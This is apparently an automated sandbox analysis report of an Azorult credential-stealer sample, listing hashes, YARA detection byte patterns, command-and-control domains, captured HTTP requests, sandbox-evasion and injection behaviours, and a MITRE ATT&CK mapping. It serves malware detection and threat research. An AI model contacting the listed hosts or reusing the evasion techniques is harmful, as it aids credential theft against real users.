Analysis Report e0YQRfcpqS.exe

Overview

General Information

Sample Name: e0YQRfcpqS.exe
Analysis ID: 361333
MD5: 936100c988a1cada3c86b057c019d1f0
SHA1: a93fc4ca21d28e38c9e225da081a7a7879457d8e
SHA256: 2fff4895961b88cecf01af71e7d7ad3b3c2359332a5501444310350aefd81748
Tags: AZORult, exe

Detection

Azorult
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Azorult
Yara detected Azorult Info Stealer
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • e0YQRfcpqS.exe (PID: 4740 cmdline: 'C:\Users\user\Desktop\e0YQRfcpqS.exe' MD5: 936100C988A1CADA3C86B057C019D1F0)
    • e0YQRfcpqS.exe (PID: 6564 cmdline: C:\Users\user\Desktop\e0YQRfcpqS.exe MD5: 936100C988A1CADA3C86B057C019D1F0)
  • cleanup

Malware Configuration

Threatname: Azorult

{"config: ": ["MachineID :", "EXE_PATH  :", "Computer(Username) :", "Screen:", "Layouts:", "LocalTime:", "Zone:", "[Soft]", "Host: www.realmadrid.com\r"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |
00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp | Azorult_1 | Azorult Payload | kevoreilly |
  • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
  • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group |
  • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x1a360:$v2: http://ip-api.com/json
  • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.e0YQRfcpqS.exe.400000.0.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |
6.2.e0YQRfcpqS.exe.400000.0.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
6.2.e0YQRfcpqS.exe.400000.0.unpack | Azorult_1 | Azorult Payload | kevoreilly |
  • 0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
  • 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
6.2.e0YQRfcpqS.exe.400000.0.unpack | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group |
  • 0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x19760:$v2: http://ip-api.com/json
  • 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
6.2.e0YQRfcpqS.exe.400000.0.raw.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: e0YQRfcpqS.exe.4740.0.memstr, Malware Configuration Extractor: Azorult {"config: ": ["MachineID :", "EXE_PATH :", "Computer(Username) :", "Screen:", "Layouts:", "LocalTime:", "Zone:", "[Soft]", "Host: www.realmadrid.com\r"]}
Multi AV Scanner detection for submitted file
Source: e0YQRfcpqS.exe, ReversingLabs: Detection: 10%
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_004094C4 CryptUnprotectData,LocalFree,6_2_004094C4

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown, HTTPS traffic detected: 99.86.159.103:443 -> 192.168.2.5:49722 version: TLS 1.0
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: e0YQRfcpqS.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_0041303C FindFirstFileW,FindNextFileW,FindClose,6_2_0041303C
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,6_2_004111C4
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,6_2_00414408
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,6_2_00412D70
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_0041158C FindFirstFileW,FindNextFileW,FindClose,6_2_0041158C
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_00411590 FindFirstFileW,FindNextFileW,FindClose,6_2_00411590
Source: C:\Users\user\Desktop\e0YQRfcpqS.exe, Code function: 6_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,6_2_00412D9C

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: Host: www.realmadrid.com
Uses dynamic DNS services
Source: unknown, DNS query: name: aca1cab2451.duckdns.org
Source: Joe Sandbox View, IP Address: 151.101.2.133
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown, HTTPS traffic detected: 99.86.159.103:443 -> 192.168.2.5:49722 version: TLS 1.0
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Other
  Host: www.chelseafc.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /base/C3A1798AE90316BAA425420BB0F9E3EA.html HTTP/1.1
  User-Agent: Other
  Host: 0k10dk21kkeok2e.online
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Other
  Host: www.liverpoolfc.com
  Connection: Keep-Alive
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/membership
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/my-lfc/join/user-details?user_type=free
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.com/tickets
              Source: e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpoolfc.comH
              Source: e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmpString found in binary or memory: https://www.mancity.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRmYpu
              Source: e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Accessibility
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Help/Privacy-Policy
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/Partners/Global/Visit-Malta
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/help/club-contacts?int_source=manutd.com&amp;int_medium=menu&amp;int_campa
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/marriott-hotels
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com/en/partners/global/swissquote
              Source: e0YQRfcpqS.exe, 00000000.00000002.272813491.0000000003396000.00000004.00000001.sdmpString found in binary or memory: https://www.manutd.com4
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.mitel.com/learn/case-studies/liverpool-football-club
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.mondelezinternational.com/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.nike.com/gb/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.quorn.com/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com
              Source: e0YQRfcpqS.exe, 00000000.00000002.272830475.00000000033A9000.00000004.00000001.sdmp, e0YQRfcpqS.exe, 00000000.00000002.272888358.00000000033F2000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com/base/uIJBEuhZwHfuEruqtWZLYlYmKZhrCgYNpCevGEPixchHNslePakqGiwLoUJiSfYvRcRm
              Source: e0YQRfcpqS.exe, 00000000.00000002.272867530.00000000033CD000.00000004.00000001.sdmpString found in binary or memory: https://www.realmadrid.com4
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.snapchat.com/
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/
              Source: e0YQRfcpqS.exe, 00000000.00000003.251645745.0000000004755000.00000004.00000001.sdmpString found in binary or memory: https://www.tourism-mauritius.mu
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.twitter.com/realmadrid
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/manutd
              Source: e0YQRfcpqS.exe, 00000000.00000002.272855563.00000000033C2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/realmadrid
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult Payload Author: kevoreilly
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult Payload Author: kevoreilly
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 0_2_031ED004 0_2_031ED004
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 0_2_031EF470 0_2_031EF470
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 0_2_031EB184 0_2_031EB184
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 0_2_031EDA00 0_2_031EDA00
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 0_2_031ED9F0 0_2_031ED9F0
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: String function: 00403B98 appears 44 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: String function: 00404E64 appears 33 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: String function: 00404E3C appears 87 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: String function: 004062D8 appears 34 times
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: String function: 004034E4 appears 36 times
              Source: e0YQRfcpqS.exe Static PE information: invalid certificate
              Source: e0YQRfcpqS.exe, 00000000.00000002.276024576.0000000004361000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHIT.dll* vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.271905116.0000000000F36000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSmtpSection.exe8 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.272749215.0000000003361000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMCjd Esf.exe2 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000000.00000002.279728666.0000000006E50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe Binary or memory string: OriginalFilename vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000006.00000002.272256972.0000000000566000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSmtpSection.exe8 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe, 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameMCjd Esf.exe2 vs e0YQRfcpqS.exe
              Source: e0YQRfcpqS.exe Binary or memory string: OriginalFilenameSmtpSection.exe8 vs e0YQRfcpqS.exe
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: classification engine Classification label: mal92.troj.spyw.winEXE@3/4@23/4
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe File created: C:\Users\user\AppData\Local\gLCtQBLkJiklhuQmKxvHxPdgE
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-F79707E2-6EF13B97
              Source: e0YQRfcpqS.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: e0YQRfcpqS.exe ReversingLabs: Detection: 10%
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe File read: C:\Users\user\Desktop\e0YQRfcpqS.exe:Zone.Identifier
              Source: unknown Process created: C:\Users\user\Desktop\e0YQRfcpqS.exe 'C:\Users\user\Desktop\e0YQRfcpqS.exe'
              Source: unknown Process created: C:\Users\user\Desktop\e0YQRfcpqS.exe C:\Users\user\Desktop\e0YQRfcpqS.exe
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Process created: C:\Users\user\Desktop\e0YQRfcpqS.exe C:\Users\user\Desktop\e0YQRfcpqS.exe
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: e0YQRfcpqS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: e0YQRfcpqS.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              Binary contains a suspicious time stamp
              Source: initial sample Static PE information: 0xFABC5879 [Sun Apr 22 01:10:17 2103 UTC]
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket, 6_2_00418124
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 6_2_00417B1A
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe TID: 3020 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe TID: 4012 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe TID: 5420 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_0041303C FindFirstFileW,FindNextFileW,FindClose, 6_2_0041303C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_004111C4 FindFirstFileW,FindNextFileW,FindClose, 6_2_004111C4
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 6_2_00414408
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00412D70 FindFirstFileW,FindNextFileW,FindClose, 6_2_00412D70
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_0041158C FindFirstFileW,FindNextFileW,FindClose, 6_2_0041158C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00411590 FindFirstFileW,FindNextFileW,FindClose, 6_2_00411590
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00412D9C FindFirstFileW,FindNextFileW,FindClose, 6_2_00412D9C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00416740 GetSystemInfo, 6_2_00416740
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: e0YQRfcpqS.exe, 00000000.00000002.278575004.0000000006340000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: e0YQRfcpqS.exe, 00000000.00000002.279355338.0000000006780000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket, 6_2_00418124
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00407A34 mov eax, dword ptr fs:[00000030h] 6_2_00407A34
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Memory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Process created: C:\Users\user\Desktop\e0YQRfcpqS.exe C:\Users\user\Desktop\e0YQRfcpqS.exe
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: GetLocaleInfoA, 6_2_00404B4C
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Queries volume information: C:\Users\user\Desktop\e0YQRfcpqS.exe VolumeInformation
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_004065CC GetUserNameW, 6_2_004065CC
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Code function: 6_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId, 6_2_00404C15
              Source: C:\Users\user\Desktop\e0YQRfcpqS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              Yara detected Azorult
              Source: Yara match File source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: e0YQRfcpqS.exe PID: 4740, type: MEMORY
              Source: Yara match File source: Process Memory Space: e0YQRfcpqS.exe PID: 6564, type: MEMORY
              Source: Yara match File source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Yara detected Azorult Info Stealer
              Source: Yara match File source: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.276566372.00000000044E7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: e0YQRfcpqS.exe PID: 4740, type: MEMORY
              Source: Yara match File source: Process Memory Space: e0YQRfcpqS.exe PID: 6564, type: MEMORY
              Source: Yara match File source: 6.2.e0YQRfcpqS.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.2.e0YQRfcpqS.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: Process Memory Space: e0YQRfcpqS.exe PID: 4740, type: MEMORY
              Source: Yara match File source: Process Memory Space: e0YQRfcpqS.exe PID: 6564, type: MEMORY

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Native API 1 | Application Shimming 1 | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | System Owner/User Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 23 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp 1 | DCSync | System Information Discovery 24 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              e0YQRfcpqS.exe | 10% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              Source | Detection | Scanner | Label
              6.2.e0YQRfcpqS.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108750

              Domains

              No Antivirus matches

              URLs


              Domains and IPs

              Contacted Domains


              Contacted URLs

